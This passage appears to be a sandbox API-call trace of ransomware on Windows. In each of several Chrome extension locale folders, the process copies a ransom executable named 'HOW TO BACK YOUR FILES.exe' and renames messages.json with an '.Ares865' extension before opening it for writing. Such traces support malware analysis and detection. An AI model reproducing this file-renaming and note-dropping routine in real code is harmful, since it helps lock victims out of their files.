GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=686) returned 1 [0101.308] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko" [0101.308] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko" [0101.308] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.308] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.309] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.309] GetLastError () returned 0x0 [0101.309] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.310] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8276d1d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e501700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e501700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.310] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.310] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.310] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.310] lstrlenW (lpString="messages.json") returned 13 [0101.310] lstrlenW (lpString="Ares865") returned 7 [0101.310] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.310] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.Ares865") returned 164 [0101.310] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.312] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=669) returned 1 [0101.315] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja" [0101.315] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja" [0101.315] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.316] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.316] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.316] GetLastError () returned 0x0 [0101.317] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.317] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82763590, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e501700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e501700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.317] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.317] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.317] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.317] lstrlenW (lpString="messages.json") returned 13 [0101.317] lstrlenW (lpString="Ares865") returned 7 [0101.317] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.317] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.Ares865") returned 164 [0101.317] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.319] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=778) returned 1 [0101.323] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it" [0101.323] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it" [0101.323] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.323] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.324] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.325] GetLastError () returned 0x0 [0101.325] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82759950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e501700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e501700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.325] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.325] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.325] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.325] lstrlenW (lpString="messages.json") returned 13 [0101.325] lstrlenW (lpString="Ares865") returned 7 [0101.325] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.Ares865") returned 164 [0101.326] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.327] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=622) returned 1 [0101.334] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id" [0101.334] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id" [0101.334] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.334] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.334] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.335] GetLastError () returned 0x0 [0101.335] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.335] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82752420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e501700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e501700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.335] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.335] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.335] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.335] lstrlenW (lpString="messages.json") returned 13 [0101.335] lstrlenW (lpString="Ares865") returned 7 [0101.335] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.336] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.Ares865") returned 164 [0101.336] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=617) returned 1 [0101.341] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu" [0101.341] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu" [0101.341] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.341] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.342] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.342] GetLastError () returned 0x0 [0101.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.342] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8274aef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e527860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e527860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.343] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.343] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.343] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.343] lstrlenW (lpString="messages.json") returned 13 [0101.343] lstrlenW (lpString="Ares865") returned 7 [0101.343] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.343] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.Ares865") returned 164 [0101.343] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 